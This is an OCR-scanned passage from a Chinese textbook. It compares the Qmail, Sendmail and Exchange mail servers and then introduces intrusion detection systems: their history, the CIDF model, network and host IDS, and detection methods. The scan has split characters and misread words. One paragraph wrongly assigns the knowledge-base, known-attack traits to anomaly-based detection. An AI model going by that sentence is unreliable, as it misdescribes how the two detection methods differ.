对 不 同 部 分 的 配置 (如 虚拟 域 或 虚拟 主机 等 )。 这 些 配置 说 明 都 在 man 中 有 很 好 的 文档 ,但 
是 Qmail 的 代码 结构 不 是 很 好 。 

Qmail 要 比 Sendmail 小 很 多 ,缺乏 一 些 邮 件 服务 器 所 具有 的 特色 功能 。 与 Sendmail 不 
同 的 是 ,Qmail 不 对 邮件 信封 的 发 送 者 的 域名 进行 验证 ,用 以 确保 域名 的 正确 性 。 自 身 不 提 
供 对 RBL 的 支持 ,而 需要 add-on 来 实现 。 同 样 ,Qmail 不 能 拒绝 接收 目的 的 接收 入 不 存在 
信件 ,而 是 先 将 邮件 接收 下 来 ,然后 返回 查 无 此 用 户 的 邮件 。Qmail 最 大 的 问题 就 在 发 送 邮 
件 给 多 个 接收 者 的 处 理 上 。 若 发 送 一 个 很 大 的 邮件 给 同一 个 域 中 的 多 个 用 户 ,Sendmail 将 
只 向 目的 邮件 服务 器 发 送 一 个 复制 邮件 。 而 Qmail 将 并 行 地 连接 多 次 ,每 次 都 发 送 一 个 复 
制 件 给 一 个 用 户 。 若 用 户 经 常 要 发 送 大 邮件 给 多 个 用 户 , 使 用 Qmail 将 浪费 很 多 带宽 。 可 
以 这 么 认为 : Sendmail 优化 节省 带宽 资源 ,Qmail 优化 节省 时 间 。 若 用 户 系 统 有 很 好 的 带 
宽 ,Qmail 将 具有 更 好 的 性 能 ,而 如 果 用 户 系 统 的 带宽 资源 有 限 , 并 且 要 发 送 很 多 邮件 列表 
信息 , 则 Sendmail 效率 更 高 一 些 。Qmail 不 支持 . forward(. forward 在 很 多 情况 下 对 用 户 
很 有 用 处 ) 不 使 用 /var/spool/mail, 而 是 将 邮件 存放 在 用 户 home 目录 。 

Qmail 的 源 代码 相对 于 Sendmail 来 说 更 容易 理解 ,这 对 于 希望 深入 到 内 部 了 解 MTA 
机 制 的 人 员 来 说 是 一 个 优点 。Qmail 在 安全 性 方面 也 要 稳定 一 些 。Qmail 有 很 好 的 技术 支 
持 , 但 是 并 没有 像 Sendmail 那样 被 广泛 地 应 用 。Qmail 的 安装 不 像 Sendmail 那样 自动 化 ， 
需要 手工 安装 。 而 且 Qmail 的 文档 不 像 Sendmail 那样 完整 和 丰富 。 

Qmail 的 add-on 比 Sendmail 要 少 。 一 般 来 说 ,对 于 经 验 稍微 少 的 管理 员 ,选择 Qmail 
相对 要 简单 一 点 ,而 且 其 特色 功能 能 满足 一 般 用 户 的 需求 。Sendmail 类似 于 Office 套件 ， 
80% 的 功能 往往 都 不 被 使 用 。 这 就 使 Qmail 在 一 些 场 合 可 能 更 受 欢 迎 一 些 , 它 具有 一 
些 Sendmail 所 没有 的 更 流行 和 实用 的 特色 功能 ,如 Qmail 具有 内 置 的 POP3 支持 。 
Qmail 同样 支持 如 主机 或 用 户 的 伪装 、 虚 拟 域 等 。Qmail 的 简易 性 也 使 其 配置 相对 容易 
一 此 

Qmail 相对 于 Sendmail 更 加 安全 和 高 效 , 运 行 Qmail 的 一 台 Pentium 机 器 一 天 可 以 处 
理 大 约 2 000 000 条 消息 。 

Qmail 相对 于 其 他 的 MTA 要 简单 得 多 ,主要 体现 在 以 下 3 个 方面 
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@ 其 他 的 MTA 的 邮件 转发 .邮件 别名 和 邮件 列表 都 是 采用 相互 独立 的 机 制 , 而 Qmail 
采用 一 种 简单 的 转发 (Forwarding) 机 制 来 允许 用 户 处 理 自己 的 邮件 列表 。 

@ 其 他 的 MTA 都 提供 快速 而 不 安全 的 方式 及 慢 的 队列 方式 的 邮件 投递 机 制 ,而 
Qmail 发 送 是 由 新 邮件 的 出 现 而 触发 的 ,所 以 其 投递 只 有 一 种 模式 一 一 快速 的 队列 方式 。 

加 其 他 的 MTA 实际 上 包括 一 个 特定 版 本 的 inetd 来 监控 MTA 的 平均 负载 ,而 Qmail 
设计 了 内 部 机 制 来 限制 系统 负载 ,所 以 Qmail-smtpd 能 安全 地 从 系统 的 inetd 来 运行 。 
Sendmail 有 很 多 的 商业 支持 ,而 且 由 于 存在 大 量 的 用 户 群 ,在 互联 网 上 有 大 量 的 潜在 技术 
支持 。 而 Qmail 只 有 很 有 限 的 技术 支持 。inter7. com 公司 提供 对 Qmail 的 支持 ,该 公司 同 
样 提供 了 免费 的 add-on, 包 括 一 个 基于 Web 的 管理 工具 一 一 QmailAdmin 和 一 个 通过 
Vpopmail 对 虚拟 域 的 支持 ,甚至 包括 一 个 基于 Web 的 客户 端 接口 一 SqWebMail。 

Qmail 还 有 一 些 其 他 的 缺陷 。 如 它 不 完全 遵从 标准 , 它 不 支持 DSN, 认 为 DSN 是 一 个 
即将 消失 的 技术 ,而 Qmail 的 VERP 可 以 完成 同样 的 工作 ,而 又 不 像 DSN 依赖 于 其 他 主机 
的 支持 。Qmail 的 另外 一 个 问题 是 它 不 遵从 7b 系统 标准 ,每 次 都 发 送 8b。 若 邮件 接收 方 
不 能 处 理 这 种 情况 ,就 会 出 现 邮件 乱码 的 情况 。 

从 安全 性 来 讲 ,Sendmail 要 比 Qmail 差 一 些 ,Sendmail 在 发 展 中 出 现 过 很 多 著名 的 安 
全 漏洞 ; 而 Qmail 相对 要 短小 精 悍 ,但 是 仍然 提供 了 基本 的 STMP 功能 。Qmail 的 代码 注 
释 要 少 一 些 。Qmail 的 一 个 很 好 的 特色 是 其 支持 一 种 可 选 的 基于 目录 的 邮件 存储 格式 ,而 
不 是 使 用 一 个 很 大 的 文件 来 存储 用 户 所 有 的 邮件 。 若 用 户 的 邮件 服务 器 进行 很 多 的 POP3 
服务 , 则 这 种 邮件 存储 格式 可 以 提高 效率 。 遗 憾 的 是 ,Pine 自身 并 不 支持 这 种 存储 格式 ,如 
果 需 要 可 以 使 用 一 些 补丁 来 达到 这 个 目的 。 

Qmail 的 最 大 优点 是 : 每 个 用 户 都 可 以 创建 邮件 列表 而 无 须 具有 根 用 户 的 权限 ,如 用 
户 foo 可 以 创建 名 为 foo-slashdot, foo-linux,foo-chickens 的 邮件 列表 ,以 便 提供 更 好 的 功 
能 ,EZMLM(EZ Mailing List Maker) 可 以 支持 自动 注册 和 注销 、 索 引 等 Majordomo 所 具有 
的 各 种 功能 ,而 且 是 CLI 驱动 的 ,只 需要 编辑 很 少 的 文件 。 Qmail 非常 适合 于 小 型 系统 , 它 
一 般 只 支持 较 少 的 用 户 或 用 来 管理 邮件 列表 。Qmail 速度 快 并 且 简 单 ,Qmail 是 当 用 户 希 
望 安全 且 容 易 配置 的 最 佳 选 择 ,Qmail 可 以 在 2 个 小 时 内 完成 配置 ,而 Sendmail 可 能 在 两 
天 内 都 无 法 完成 。 

当然 除了 这 里 介绍 的 几 种 MTA 以 外 ,还 有 Smail, Post. Office, the Sun Internet Mail 
Server (SIMS), MMDF, Communi Gate, PMDF, Netscape Messaging Server, Obtuse 
smtpd/smtpfwdd,Intermail, MD Switch 等 其 他 商业 的 或 者 免费 的 MTA 可 以 选择 。 


954 Exchange Server 


Exchange Server 是 一 个 主要 的 Intranet 协作 应 用 服务 器 ,适合 于 有 各 种 协作 需求 的 用 
户 使 用 。Exchange Server 协作 应 用 的 出 发 点 是 业界 领先 的 消息 交换 基础 , 它 提供 了 业界 最 
强 的 扩展 性 \ 可 靠 性 、 安 全 性 和 最 高 的 处 理性 能 。Exchange Server 提供 了 包括 从 电子 邮件 、 
会 议 安排 ,团体 日 程 管理 ,任务 管 理 , 文 档 管 理 、 实 时 会 议和 工作 流 等 丰富 的 协作 应 用 ,而 所 
有 应 用 都 可 以 通过 Internet 浏览 器 来 访问 。 与 Microsoft BackOffice 产品 相 结合 ,使 用 通用 
的 、 熟 悉 的 开发 工具 ,Exchange Server 可 以 快速 提供 和 实施 强大 的 业务 协作 解决 方案 ,满足 
用 户 对 Intranet 协作 的 多 层次 需求 ,提高 企业 竞争 实力 。 
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它 的 主流 版 本 是 2000 年 1 月 4 日 发 布 的 5.5 SP3 版 本 。 现 在 ,Exchange 2003 Server 
已 经 问世 。 

Exchange Server 是 在 Windows NT Server 的 基础 上 开发 起 来 的 ,与 Windows NT 
Server 集成 并 为 Windows NT Server 提供 优化 。 如 Exchange Server 5. 5 的 运行 需要 
Windows NT Server 4.0 的 支持 。 如 果 要 运行 Exchange Server 企业 版 提供 集群 服务 , 则 需 
要 运行 Windows NT Server 4.0 企业 版 。 

与 竞争 产品 不 同 ,Microsoft Exchange Server 从 体系 结构 开始 就 与 Windows NT、 其 他 
后 台 产 品 和 互联 网 协议 集成 在 一 起 。 如 Exchange 是 唯一 用 Windows NT 安全 性 来 认证 用 
户 的 产品 ; Exchange 提供 了 高 性 能 的 IMAP4 和 POP3 实现 。Exchange 可 以 与 任何 兼容 
LDAPv3 的 服务 器 ,而 不 仅仅 是 Exchange 服务 器 很 好 地 实现 目录 推荐 和 同步 。 此 外 ,可 以 
使 用 SSL 3. 0 来 加 密 透 过 SMTP 的 Internet 电子 邮件 ,利用 NNTP (Network News 
Transfor Protocol, 网 络 新 闻 传送 协议 ) 自 然 访问 协作 应 用 ,而 不 需要 模板 或 文件 转换 。 

Exchange Server 是 一 个 设计 完美 的 邮件 服务 器 产品 ,提供 了 通常 所 需要 的 全 部 邮件 服 
务 功能 。 除 了 常规 的 SMTP/POP 协议 服务 之 外 , 它 还 支持 IMAP4、LDAP 和 NNTP 协议 。 
Exchange Server 服务 器 有 两 种 版 本 。 标 准 版 包括 Active Server、 网 络 新 闻 服 务 和 一 系列 与 
其 他 邮件 系统 的 接口 ; 企业 版 除了 包括 标准 版 的 功能 外 ,还 包括 与 IBM OfficeVision、 
X. 400`VM 和 SNADS 通信 的 电子 邮件 网 关 。Exchange Server 支持 基于 Web 浏览 器 的 邮 
件 访问 。 

在 Exchange Server 中 ,Internet 与 Web 有 许多 内 在 的 联系 。Exchange Server 可 以 支 
持 由 IIS 运行 的 Web 应 用 程序 。Web 用 户 可 以 通过 浏览 器 收发 电子 邮件 ,访问 网 络 新 闻 ， 
可 以 使 用 Java Applets 访问 群 件 。 

不 管 对 于 用 户 还 是 管理 员 ,Exchange Server 与 其 他 微软 产品 都 有 密切 关联 。 它 的 客户 
端 可 选 产品 为 Outlook。 但 是 ,这 并 不 意味 着 不 可 以 使 用 其 他 的 IMAP4 或 POP3 邮件 客户 
软件 访问 Exchange Server, 只 是 有 些 高 级 功能 用 不 上 。 

在 用 户 管理 上 ,Exchange Server 与 Windows NT 的 用 户 目 录 联 系 密切 。 如 果 一 个 用 
户 在 Windows NT 中 没有 账户 ,就 不 能 够 成 为 Exchange Server 的 用 户 。 配 置 Exchange 
Server 的 时 候 , 管 理 员 可 以 直接 从 Windows NT 域 中 .或 者 NetWare NDS 目录 中 引入 用 户 
信息 。 对 于 用 户 邮 箱 ,Exchange Server 也 提供 了 很 强 的 管理 手段 。 

管理 员 还 可 以 通过 一 个 称 为 Smart Host 的 功能 ,将 Exchange Server 设置 成 为 邮件 服 
务 器 阵列 的 交换 中 心 ,把 发 送 的 邮件 转 给 其 他 厂家 的 SMTP 服务 器 处 理 。 通 过 这 种 方法 ， 
可 以 建立 起 网 络 邮件 服务 器 间 直 接 的 通信 联系 。 

总 之 Exchange Server 对 于 企业 级 用 户 来 说 ,是 一 个 高 性 能 的 邮件 服务 器 产品 和 和 群 件 。 

Exchange Server 5.5 不 提供 访问 NT 域 用 户 的 功能 。 但 Exchange Server 提供 ADSI 
接口 ,创建 邮箱 很 方便 。 而 且 它 的 邮箱 可 以 与 NT 的 域 用 户 同步 。ADSI 是 活动 目录 服务 
接口 的 英文 缩写 ,原文 是 Active Directory Service Interfaces ,需要 安装 。 

但 相对 于 UNIX 平 台 下 的 邮件 服务 器 软件 ,Exchange Server 缺乏 跨 平台 能 力 ,不 支持 
UNIX 系统 。 而 且 其 价格 较为 昂贵 ,同时 Exchange Server 作为 客户 端 /服务 器 系统 ,需要 更 
强 的 计算 能 力 , 尤 其 是 服务 器 端 ,需要 较 高 硬件 支持 ,而 且 Exchange 会 占用 极 大 的 系统 
资源 。 
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an 性 


. 什么 是 SMTP 协议 ? 

. 在 UNIX/Linux 下 邮件 服务 器 有 哪 几 个 模块 ? 

.邮件 内 容 的 安全 问题 主要 包含 哪 几 个 方面 ? 

. 垃圾 邮件 通常 包含 哪些 内 容 ? 反 垃 圾 邮件 技术 主要 包括 哪些 ? 
.【 思 考题 ] 试 比较 几 种 常见 邮件 服务 器 的 性 能 和 特点 。 


CHAPTERY 


入 侵 检 测 系 统 技 术 第 10 章 


入 侵 检测 系统 (Intrusion Detection System,IDS) 是 探测 计算 机 网 络 攻击 
行为 的 软件 或 硬件 。 它 作为 防火 墙 的 合理 补充 ,可 以 帮助 网 络 管理 员 探 查 进 
入 网 络 的 入侵 行为 ,从 而 扩展 了 系统 管理 员 的 安全 管理 能 力 。 

本 章 要 点 如 下 : 

。 IDS 系统 的 分 类 和 体系 结构 ; 

。 和信 侵 检测 系统 面临 的 问题 ; 

。 入 侵 检测 系统 的 弱点 和 局 限 ; 

。 IDS 展望 。 


10.1 人 侵 检测 系统 简介 


随 着 攻击 者 技术 水 平 的 提高 ,攻击 工具 与 手段 的 多 样 化 ,单纯 在 连接 外 
网 的 接口 处 部 署 防火 墙 的 策略 ,已 经 无 法 满足 对 安全 高 度 敏感 的 部 门 的 需 
要 ,网 络 的 防卫 必须 采用 一 种 高 深 的 、 多 样 的 手段 来 保护 内 部 网 络 的 安全 ,这 
就 是 入 侵 检 测 系统 。 

入 侵 检测 系统 在 计算 机 网 络 系统 中 的 若干 关键 点 收集 信息 ,并 通过 分 析 
网 络 数据 流 、 主 机 日 志 、 系 统 调用 ,及 时 显示 出 相关 的 攻击 行为 ,从 而 提高 了 
信息 安全 基础 结构 的 完整 性 。 入 侵 检 测 被 认为 是 防火 墙 之 后 的 第 二 道 安全 
闻 门 , 它 可 以 在 不 影响 网 络 性 能 的 情况 下 对 网 络 进行 监测 。 


10.1.1 入 侵 检 测 系 统 的 发 展 


1980 年 4 月 ,James P. Anderson 向 美国 空军 提交 了 一 份 题 为 “Computer 
Security Threat Monitoring and Surveillance”( 计 算 机 安全 威胁 监控 与 监视 ) 
的 技术 报告 ,第 一 次 详细 阐述 了 入 侵 检测 的 概念 ,并 提出 了 一 种 对 计算 机 系 
统 风 险 和 威胁 的 分 类 方法 ,以 及 利用 审计 跟踪 数据 监视 入侵 活动 的 思想 。 

从 1984 年 到 1986 年 ,乔治 敦 大 学 的 Dorothy Denning 和 SRI/CSL(SRI 
公司 计算 机 科学 实验 室 ) 的 Peter Neumann 研究 出 了 一 个 实时 入 侵 检测 系统 
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模型 , 取 名 为 IDES( 入 侵 检测 专家 系统 )。 该 模型 由 6 个 部 分 组 成 : 主体 ,对象 .审计 记录 、 
轮廓 特征 、 异 常 记录 、 活 动 规则 。 它 独立 于 特定 的 系统 平台 、 应 用 环境 、 系 统 弱 点 以 及 入 侵 类 
型 ,为 构建 人 侵 检测 系统 提供 了 一 个 通用 的 框架 。 

1988 年 ,SRI/CSL 的 Teresa Lunt 等 人 改进 了 Denning 的 入侵 检测 模型 ,使 其 包含 一 
个 异常 检测 器 和 一 个 专家 系统 ,分 别 用 于 统计 异常 模型 的 建立 和 基于 规则 的 特征 分 析 检测 ， 
IDS 的 结构 框架 如 图 10. 1 所 示 。 

在 1988 年 的 莫 里 斯 蠕虫 事件 发 生 之 后 ,网 络 安全 才 真 正 引 起 人 们 的 高 度 重视 。 美 国 空 
军 、 国 家 安全 局 和 能 源 部 共同 资助 空军 密码 支持 中 心 ,劳伦斯 利 弗 摩尔 国家 实验 室 、 加 州 大 
学 戴 维 斯 分 校 、Haystack 实验 室 , 开 展 对 分 布 式 人 侵 检测 系统 (DIDS) 的 研究 ,将 基于 主机 
和 基于 网 络 的 检测 方法 集成 到 一 起 ,IDS 总 体 结构 如 图 10. 2 所 示 。 


审计 数据 源 


模式 匹配 器 轮廓 特征 引擎 


IDS 控 制 器 


异常 检测 器 主机 代理 LAN 代 理 


主机 事件 发 生 器 LAN 事 件 发 生 器 


策略 规划 


主机 监视 器 LAN 监 视 器 
图 10.1 IDS 框架 结构 图 10.2 IDS 总 体 结构 


根据 图 10. 2 所 示 ,可 以 把 人 侵 检 测 系统 的 功能 结构 分 为 两 大 部 分 : 中 心 检 测 平 台 和 代 
理 服务 器 。 代 理 服务 器 是 负责 在 各 个 操作 系统 中 采集 审计 数据 ,并 把 审计 数据 转换 成 与 平 
台 无 关 的 格式 后 ,再 传送 到 中 心 检测 平台 ,或 者 把 中 心平 台 的 审计 数据 需求 传送 到 各 个 操作 
系统 中 。 而 中 心 检测 平台 由 专家 系统 、 知 识 库 和 管理 员 组 成 ,其 功能 是 根据 代理 服务 器 采集 
来 的 审计 数据 进行 专家 系统 分 析 , 产 生 系 统 安全 报告 。 管 理 员 可 以 向 各 个 主机 提供 安全 管 
理 功能 ,根据 专家 系统 的 分 析 向 各 个 代理 服务 器 发 出 审计 数据 的 需求 。 另 外 ,在 中 心 检测 平 
台 和 代理 服务 器 之 间 通 过 安全 的 RPC 远程 过 程 调用 协议 进行 通信 。 

DIDS 是 分 布 式 人 侵 检 测 系统 历史 上 的 一 个 里 程 碑 式 的 产品 , 它 的 检测 模型 采用 了 分 
层 结构 ,包括 数据 事件 .主体 、 上 下 文 、 威 胁 和 安全 状态 等 六 层 。 

从 20 世纪 90 年 代 到 现在 ,入 侵 检测 系统 的 研发 呈现 出 百家争鸣 的 繁荣 局 面 ,并 在 智能 
化 和 分 布 式 两 个 方向 取得 了 长 足 性 的 进展 。 目 前 SRL/CSL、 普 渡 大 学 、 加 州 大 学 戴 维 斯 分 
校 . 洛 斯 阿拉 莫 斯 国家 实验 室 . 哥 伦比 亚 大 学 和 新 墨西哥 大 学 等 机 构 在 这 些 方面 的 研究 代表 
了 当前 的 最 高 水 平 。 


10.12 IDS 的 定义 


“入 侵 (Intrusion) ”是 个 广义 的 概念 ,不 仅 包括 被 发 起 攻击 的 人 (如 恶意 的 黑客 ) 取 得 超 
出 合法 范围 的 系统 控制 权 , 也 包括 收集 漏洞 信息 ,造成 DoS 等 对 计算 机 系统 造成 危害 的 
行为 。 
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入 侵 检测 则 是 通过 对 计算 机 网 络 或 计算 机 系统 中 的 若干 关键 点 收集 信息 并 对 其 进行 分 
析 , 从 而 发 现 网 络 或 系统 中 是 否 有 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 

入 侵 监 测 系统 (IDS) 与 系统 扫描 器 (system scanner) 不 同 。 系 统 扫描 器 是 根据 攻击 特 
征 数据 库 来 扫描 系统 漏洞 的 , 它 更 关注 的 是 配置 上 的 漏洞 而 不 是 当前 进出 用 户 的 主机 的 流 
量 。 在 遭受 攻击 的 主机 上 ,即使 正在 运行 着 扫描 程序 ,也 无 法 识别 这 种 攻击 。 

入侵 检 测 则 是 对 防火 墙 的 合理 补充 ,具体 说 来 ,入 侵 检 测 系统 的 主要 功能 有 以 下 几 点 。 
监测 并 分 析 用 户 和 系统 的 活动 。 

。 核查 系统 配置 和 漏洞 。 
评估 系统 关键 资源 和 数据 文件 的 完整 性 。 

。 识别 已 知 的 攻击 行为 。 

。 统计 分 析 异 常 行为 。 

。 操作 系统 日 志 管 理 , 并 识别 违反 安全 策略 的 用 户 活动 。 

对 一 个 部 署 成 功 的 入 侵 检测 系统 来 讲 , 它 不 但 可 以 使 系统 管理 员 时 刻 了 解 网 络 系 统 ( 包 
括 程序 ,文件 和 硬件 设备 等 ) 的 任何 变更 ,还 能 给 网 络 安全 策略 的 制订 提供 指南 。 而 且 它 的 
规模 还 应 该 根据 网 络 威胁 .系统 构造 和 安全 需求 的 改变 而 改变 ,在 发 现 人 侵 后 ,会 及 时 作出 
响应 ,包括 切断 网 络 连接 .记录 事件 和 报警 等 。 

目前 入侵 检测 系统 还 缺乏 相应 的 标准 。 试 图 对 IDS 进行 标准 化 的 工作 有 两 个 组 织 ， 
IETF 的 Intrusion Detection Working Group (Idwg) 和 Common Intrusion Detection 


Framework (CIDF) ,但 进展 非常 缓慢 ,统一 被 人 们 接受 的 标准 还 没有 出 台 。 
10.13 入 侵 检 测 系统 模型 


Common Intrusion Detection Framework (CIDF) 阐 述 了 一 个 和 人 侵 检 测 系统 (IDS) 的 通 
用 模型 。 它 将 一 个 人 侵 检测 系统 分 为 以 下 四 个 组 件 。 

。 事件 产生 器 (Event Generators); 

。 事件 分 析 器 (Event Analyzers) ; 

。 响应 单元 (Response Units); 

。 事件 数据 库 (Event Databases)。 

CIDF 将 IDS 需要 分 析 的 数据 统称 为 事件 (event) , 它 可 以 是 网 络 中 的 数据 包 , 也 可 以 是 
从 系统 日 志 等 其 他 途径 得 到 的 信息 。 

事件 产生 器 的 目的 是 从 整个 计算 环境 中 获得 事件 ,并 向 系统 的 其 他 部 分 提供 此 事件 。 

事件 分 析 器 分 析 得 到 的 数据 ,并 产生 分 析 结 果 。 

响应 单元 则 是 对 分 析 结 果 做 出 反应 的 功能 单元 , 它 可 以 做 出 切断 连接 、 改 变 文件 属性 等 
强烈 反应 ,也 可 以 只 是 简单 的 报警 。 

事件 数据 库 是 存放 各 种 中 间 和 最 终 数 据 的 地 方 的 统称 , 它 可 以 是 复杂 的 数据 库 , 也 可 以 
是 简单 的 文本 文件 。 

在 这 个 模型 中 ,前 三 个 以 程序 的 形式 出 现 , 而 事件 数据 库 则 是 以 文件 或 数据 流 的 形式 
存在 。 
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10.14 IDS 监测 位 置 


1990 年 加 州 大 学 戴 维 斯 分 校 的 L. T. Heberlein 等 人 开发 了 NSM(Network Security 
Monitor) 系 统 。 该 系统 第 一 次 直接 将 网 络 流 作为 审计 数据 来 源 , 因 而 ,可 以 在 不 将 审计 数据 
转换 成 统一 格式 的 情况 下 监控 各 种 基础 的 主机 。 按 照 IDS 监测 位 置 进行 区 分 ,IDS 系统 分 
为 基于 网 络 的 IDS 和 基于 主机 的 IDS。 


1. 基于 网 络 的 IDS 


基于 网 络 的 IDS 对 数据 包 进 行 分 析 以 探测 针对 网 络 的 攻击 。 这 种 IDS 嗅 探 Csniff) 网 
络 数据 包 ,并 将 数据 流 与 已 知人 侵 行为 的 特征 进行 比较 。 一 个 典型 的 基于 网 络 的 IDS 部 署 


如 图 10. 3 所 示 。 
探测 器 
| 
号 


企业 网 


图 10.3 基于 网 络 的 IDS 部 署 


需要 说 明 的 是 ,基于 网 络 的 IDS 并 不 一 定 是 基于 攻击 特征 来 进行 检测 的 ,也 可 以 在 网 
络 中 使 用 异常 检测 型 IDS。“ 基 于 网 络 ? 这 个 标志 只 是 说 明 IDS 检测 网 络 数据 流 的 位 置 ,而 
不 代表 用 于 产生 警报 的 触发 机 制 。 

基于 网 络 的 IDS 的 优点 是 它 可 以 对 全 网 进行 监控 ,如 果 有 人 扫描 网 络 中 的 主机 ,相关 
信息 很 容易 被 基于 网 络 的 IDS 检测 到 。 

基于 网 络 的 IDS 的 另 一 个 优点 是 , 它 不 需要 运行 在 网 络 中 的 每 一 种 操作 系统 上 ,基于 
网 络 的 IDS 只 需要 运行 在 有 限 数量 的 探测 器 和 控制 器 平台 上 ,这 些 平台 可 以 被 挑选 出 来 满 
足 特 定 的 性 能 需求 。 

基于 网 络 的 IDS 的 缺点 是 它 对 带宽 的 要 求 。 随 着 网 络 带宽 变 得 越 来 越 大 , 既 要 实时 检 
测 穿 过 网 络 的 所 有 数据 流 ,又 不 能 丢 包 ,这 样 就 变 得 相当 困难 。 这 就 需要 在 网 络 中 部 署 更 多 
的 探测 器 ,使 每 个 位 置 上 的 流量 都 不 超过 探测 器 的 处 理 能 力 。 

基于 网 络 的 IDS 的 男 一 个 缺点 是 , 当 用 户 使 用 加 密 软 件 加 密 数据 时 ,这 种 IDS 就 无 能 
为 力 了 。 随 着 越 来 越 多 的 用 户 和 网 络 开 始 为 用 户 会 话 提供 加 密 保护 ,基于 网 络 的 IDS 的 可 
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用 信息 也 就 越 来 越 少 。 如 果 网 络 数据 流 是 被 加 过 密 的 , 则 网 络 探测 器 就 不 能 根据 特征 数据 
库 来 判断 其 中 是 否 存在 入 侵 行为 。 
2. 基于 主机 的 IDS 


基于 主机 的 IDS 通过 在 主机 或 操作 系统 上 检查 有 关 信 息 来 探测 人 侵 行为 。 这 种 IDS 
通过 系统 调用 、 审 计 日 志和 错误 信息 等 对 主机 进行 分 析 。 一 个 典型 的 基于 主机 的 IDS 部 署 


如 图 10.4 所 示 。 
早 ” 早 ” 


企业 网 器 代理 


WWW 
服务 器 


不 可 信赖 的 
网 络 


10.4 基于 主机 的 IDS 部 署 


基于 主机 的 IDS 的 优点 是 这 种 IDS 是 对 到 达 攻 击 目 标的 数据 流 进行 分 析 , 所 以 它 拥 有 
攻击 是 否 成 功 的 第 一 手 信息 。 在 基于 网 络 的 IDS 中 ,警报 的 产生 是 针对 已 知 的 入 侵 行为 
的 ,但 只 有 基于 主机 的 IDS 才能 确定 一 个 攻击 到 底 是 否 成 功 。 

对 于 基于 网 络 的 IDS 来 说 ,对 数据 包 分 片 重 组 改变 生存 时 间 等 攻击 是 比较 难处 理 的 ， 
而 对 基于 主机 的 IDS 则 可 以 利用 主机 自己 的 IP 协议 栈 来 防御 这 类 攻击 。 

基于 主机 的 IDS 的 缺点 是 它 对 网 络 监控 的 范围 有 限 , 这 是 因为 大 多 数 基于 主机 的 IDS 
不 能 监测 针对 主机 的 端口 扫描 ,所 以 让 基于 主机 的 IDS 来 检测 针对 网 络 的 扫描 几乎 是 不 可 
能 的 。 而 这 些 扫描 有 时 是 针对 网 络 进 一 步 攻 击 的 一 个 关键 信号 。 

基于 主机 的 IDS 另 一 个 缺点 是 , 它 必须 运行 在 网 络 中 的 所 有 操作 系统 上 。 目 前 ,在 网 
络 中 统一 安装 相同 的 操作 系统 是 不 现实 的 ,这 就 对 IDS 的 开发 带 来 了 极 大 的 挑战 。 有 些 基 
于 主机 的 IDS 只 支持 某 种 类 型 的 操作 系统 ,如 果 基 于 主机 的 IDS 软件 不 能 支持 网 络 中 所 有 
的 操作 系统 ,那么 网 络 也 就 得 不 到 完整 的 入 侵 防 护 了 。 


10.15 入 侵 检 测 技 术 


对 各 种 事件 进行 分 析 , 从 中 发 现 违反 安全 策略 的 行为 是 入 侵 检测 系统 的 核心 功能 。 从 
技术 上 ,入 侵 检 测 分 为 两 类 : 一 种 基于 标志 (signature-based), 另 一 种 基于 异常 情况 
(anomaly-based) 。 


对 于 基于 标识 的 检测 技术 来 说 ,首先 要 定义 违背 安全 策略 的 事件 的 特征 ,如 网 络 数 据 包 
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的 某 些 头 信息 。 检 测 主要 判别 这 类 特征 是 否 在 所 收集 到 的 数据 中 出 现 。 此 方法 非常 类 似 于 
杀毒 软件 。 

而 基于 异常 的 检测 技术 则 是 先 定义 一 组 系统 “正常 ”情况 的 数值 ,如 CPU 利用 率 、 内 存 
利用 率 和 文件 校 验 和 等 (这 类 数值 可 以 人 为 定义 ,也 可 以 通过 观察 系统 ,并 用 统计 的 办 法 得 
出 ) 数 值 ,然后 将 系统 运行 时 的 数值 与 所 定义 的 “正常 ”情况 比较 ,得 出 是 否 有 被 攻击 的 迹象 。 
这 种 检测 方式 的 核心 在 于 如 何 定 义 所 谓 的 “正常 ”情况 。 

两 种 检测 技术 的 方法 所 得 出 的 结论 有 非常 大 的 差异 。 基 于 异常 的 检测 技术 的 核心 是 维 
护 一 个 知识 库 。 对 于 已 知 的 攻击 , 它 可 以 详细 准确 地 报告 出 攻击 类 型 ,但 是 对 未 知 攻击 的 
检测 能 力 都 很 有 限 ,而 且 知识 库 必 须 不 断 更 新 。 基 于 异常 的 检测 技术 则 无 法 准确 判别 出 攻 
击 的 手段 ,但 它 可 以 (至 少 在 理论 上 可 以 ) 判 别 更 广泛 、 甚 至 未 发 觉 的 攻击 。 如 果 条 件 允 许 ， 
两 者 结合 的 检测 会 达到 更 好 的 效果 。 


10.1.6 信息 收集 


入 侵 检测 的 第 一 步 是 信息 收集 ,任意 收集 的 内 容 包 括 系统 .网 络 、 数 据 及 用 户 活动 的 状 
态 和 行为 。 而 且 , 需 要 在 计算 机 网 络 系统 中 的 若干 不 同 关键 点 (不 同 网 段 和 不 同 主机 ) 收 集 
信息 ,这 除了 尽 可 能 扩大 检测 范围 的 因素 外 ,还 有 一 个 重要 的 因素 就 是 从 一 个 原始 信息 可 能 
看 不 出 疑点 ,但 从 几 个 原始 信息 的 不 一 致 性 却 能 发 现 可 疑 行为 或 入 侵 的 最 好 标志 。 

当然 ,和 人 侵 检测 很 大 程度 上 依赖 于 收集 信息 的 可 靠 性 和 正确 性 ,因此 ,很 有 必要 利用 所 
知道 的 真正 的 和 精确 的 软件 来 报告 这 些 信息 。 因 为 黑客 经 常 替 换 软件 以 混淆 和 移 走 这 些 信 
息 , 例 如 替换 被 程序 调用 的 子 程序 、 库 和 其 他 工具 。 黑 客 对 系统 的 修改 可 能 使 系统 功能 失常 
但 看 起 来 跟 正常 的 一 样 ,而 实际 上 不 是 。 例 如 ,UNIX 系统 的 PS 指令 可 以 被 替换 为 一 个 不 
显示 侵入 过 程 的 指令 ,或 者 是 编辑 器 被 替换 成 一 个 读 取 不 同 于 指定 文件 的 文件 (黑客 隐藏 了 
初始 文件 并 用 另 一 版 本 代替 )。 这 就 需要 保证 用 来 检测 网 络 系统 的 软件 的 完整 性 ,特别 是 人 
侵 检 测 系统 软件 本 身 应 具有 相当 强 的 坚固 性 ,以 防止 被 筑 改 而 收集 到 错误 信息 。 

入 侵 检测 利用 的 信息 一 般 来 自 四 个 方面 ,下 面 分 别 对 这 四 个 方面 进行 详细 介绍 。 


1. 系统 和 网 络 日 志文 件 


黑客 经 常 在 系统 日 志文 件 中 留 下 踪迹 ,因此 充分 利用 系统 和 网 络 日 志文 件 信息 是 检测 
